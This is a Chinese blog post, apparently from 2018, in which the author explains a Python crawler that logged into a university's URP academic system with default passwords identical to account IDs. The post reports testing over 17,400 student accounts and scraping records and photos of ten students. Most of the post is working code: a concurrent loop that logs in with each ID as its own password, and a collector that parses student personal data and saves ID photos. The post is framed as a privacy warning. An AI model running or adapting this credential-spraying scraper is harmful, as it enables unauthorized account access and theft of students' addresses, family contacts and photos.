你的個人資訊正暴露在網際網路中!Python 爬蟲獲取 URP 教務系統學籍資訊

擺碼王子發表於2018-02-11

你的個人資訊正暴露在網際網路中!Python 爬蟲獲取 URP 教務系統學籍資訊
原創文章,轉載務必註明原文連結!

初衷

本文旨在提醒同學們及時修改密碼,增強保護個人隱私的意識,因此程式碼中一些關鍵資料以及校名等資訊不會公開!複製貼上文章中的程式碼不會爬到任何東西。只是作為學習 Python 爬蟲的一點總結而已!

作者所在學校的教務系統安全防範措施可謂非常不嚴密,學生登入甚至不需要圖形驗證碼。每年學生入學之後,學校下發的賬號,初始密碼不是無規律的,而是和賬號完全一致!如果學生不及時修改密碼,那麼其他人可以輕鬆登入他的賬號。登入後可以看到學生的學籍資訊,包括高考報名時照片,家長聯絡方式等,聯絡地址甚至詳細到幾單元幾樓幾號門,個人資訊洩露情況非常嚴重!

結果

先說結果。經過兩天連寫帶除錯,終於完成了對全校本科生 17400 多個在網賬號的測試,其中有 12600 多個賬號使用的還是初始密碼。此處隱去校名,統計結果如下:

序號 學院 年級 在網賬號 可爬賬號 年級佔比
1 本一 2014 3157 1998 63.29%
2 本一 2015 3328 2234 67.13%
3 本一 2016 3641 3066 84.21%
4 本一 2017 3497 3326 95.11%
5 本三 2014 1759 303 17.23%
6 本三 2015 1643 620 37.74%
7 本三 2016 1605 1434 89.35%
8 本三 2017 1552 639 41.17%

介於初衷,只爬了 10 個賬號的資訊,以示嚴重性!

爬到的學籍資訊

過程

本人之前做過近 2 年的 Java 相關開發,對 HTTP 協議中常用的知識瞭解一些,再加上 Python 出了名的簡潔易用,因此入門還是比較輕鬆的。去年有一段時間研究過一陣子 Python,使用的是 Scrapy 框架,所以這一次我也首先想到了 Scrapy。

Scrapy 這種框架適用的情形是:已經獲取了需要爬取的頁面的一系列 URL ,或者 URL 是成一定規律變化的,不需要登入或者登入一次拿到 Cookie 就可以拿著這個 Cookie 一直用了。但是教務系統完全相反,它需要每次都進行登入,也許 Scrapy 有辦法,但也不會太簡單,索性自己寫。

這套教務系統雖然安全性不怎麼樣,但也已是一套成熟的產品了,功能和穩定性上還是很不錯的。

系統的登入介面

首先使用 Firefox 瀏覽器的開發者工具檢視 HTTP 通訊的一些資訊:

登入請求 ( POST )

登入表單通過 POST 請求進行提交,引數是賬號和密碼,傳送的也是明文

表單引數

伺服器返回的響應中 Set-Cookie 就相當於給使用者下發的令牌,使用者下一次請求的時候帶上這塊令牌,伺服器就能認出來這個使用者是否剛登入過。這個令牌是有時間限制的,每次請求都會重新整理一次時間,如果兩次請求之間間隔時間超過設定值,那麼伺服器就不認識使用者了,這次會話就結束了,需要重新登入。

登入的響應體

剛開始使用的是 requests ,用 for 迴圈實現,由於 requests 是同步的,所以效率很低,還會經常卡死。後來改成了協程,用的 gevent + urllib3,效率提升了上百倍。解析 HTML 用的 lxml 的 etree,圖片的儲存用 PIL 的 Image。

先引入依賴

import sys
import logging
import gevent
import urllib3
import pathlib
from PIL import Image
from io import BytesIO
from lxml import etree
複製程式碼

建立 HTTP 連線池

http = urllib3.HTTPConnectionPool(
	host=settings.SERVER_HOST,
	port=settings.SERVER_PORT,
	strict=False,
	maxsize=100,
	block=False,
	retries=100,
	timeout=10
)
複製程式碼

請求頭的一些固定資訊可以預先設定好,偽裝瀏覽器

header = {'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
	'Accept-Encoding': 'gzip, deflate',
	'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
	'Cache-Control': 'max-age=0',
	'Connection': 'Keep-alive',
	'Host': settings.SERVER_HOST,
	'Upgrade-Insecure-Requests': '1',
	'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0'
}
複製程式碼

登入並驗證是否是初始密碼

# 賬號校驗器
class InfoValidate(object):
	def __init__(self):
		self.logger = InfoMain.logger
		self.http = InfoMain.http
		# 有效賬號
		self.account_valid = []
		# 可爬賬號
		self.account_available = []

	def validate(self, all_account):
		# 將所有校驗過程加入佇列
		jobs = [gevent.spawn(self.validate_account, self.http, a) for a in all_account]
		gevent.joinall(jobs, timeout=0)

	def validate_account(self, http, account):
		# 登入請求引數
		param = {"zjh": account, "mm": account}
		header = headers.header
		response = http.request('POST', settings.URL_LOGIN, fields=param, headers=header)
		self.logger.info('傳送請求>>{}'.format(param))
		self.logger.info(response.status)
		# 響應體解碼
		res_text = response.data.decode('GB2312', 'ignore')

		if res_text.find('密碼不正確') > -1:
			# 密碼有誤
			self.account_valid.append(account)
		elif not res_text.find('證件號不存在') > -1:
			# 賬號可爬
			self.account_available.append(account)
			self.account_valid.append(account)
			self.logger.info("賬號可用>>>{}".format(account))
複製程式碼

至此已經獲取了所有初始密碼未修改的賬號了,下面研究一下,要爬取的學籍資訊頁的規律

學籍資訊頁

table 的結構

一系列的資訊都包裹在 <td width = "275"></td>之間,對應的 xpath 表示式即為 //td[starts-with(@width,"275")]/text()

基於之前對賬號的測試,爬取學籍資訊

# 資訊收集器
class InfoCollect(object):
	def __init__(self):
		self.logger = InfoMain.logger
		self.http = InfoMain.http
		# 功能模組
		self.mod_get_roll_info = settings.MOD_ROLL_INFO
		self.mod_get_roll_img = settings.MOD_ROLL_IMG

	def get_info_queue(self, accounts):
		# 將所有資訊收集過程加入佇列
		jobs = [gevent.spawn(self.get_info, a) for a in accounts]
		gevent.joinall(jobs, timeout=0)

	def get_info(self, stuid):
		# 登入
		param = {'zjh': stuid, 'mm': stuid}
		response = self.http.request('POST', settings.URL_LOGIN, fields=param)
		# 儲存 Cookie
		cookie = response.headers['Set-Cookie'].replace('; path=/', '')
		header = headers.header
		header['cookie'] = cookie
		# 學籍資訊
		if self.mod_get_roll_info:
			# 帶 Cookie 訪問學籍資訊頁
			response_xjxx = self.http.request('GET', settings.URL_XJXX, headers=header)
			text = response_xjxx.data.decode('GB2312', 'ignore')
			# 解析頁面內容
			selector = etree.HTML(text)
			text_arr = selector.xpath('//td[starts-with(@width,"275")]/text()')
			# 學籍資訊
			result = []
			for info in text_arr:
				result.append(info.strip())
			self.save_info(result)
		# 學籍照片
		if self.mod_get_roll_img:
			response_xjzp = self.http.request('GET', settings.URL_XJZP, headers=header)
			image = Image.open(BytesIO(response_xjzp.data))
			setpath = settings.PATH_IMG_SAVE
			path = pathlib.Path(setpath)
			if not path.exists():
				path.mkdir()
			setpath = setpath + '/' + stuid + '.jpg'
			image.save(setpath)
			self.logger.info('儲存照片>>>{}'.format(setpath))

		# 登出
		self.http.request('POST', settings.URL_LOGOUT, headers=header)
複製程式碼

至此,已經實現了所有資訊的獲取以及照片的儲存。

沒改密碼的同學們應該看到了,獲取個人資訊其實很簡單,關鍵在於增強自己保護個人資訊的意識。

相關開源專案:URP_Spider github.com/JamesZBL/UR…

相關文章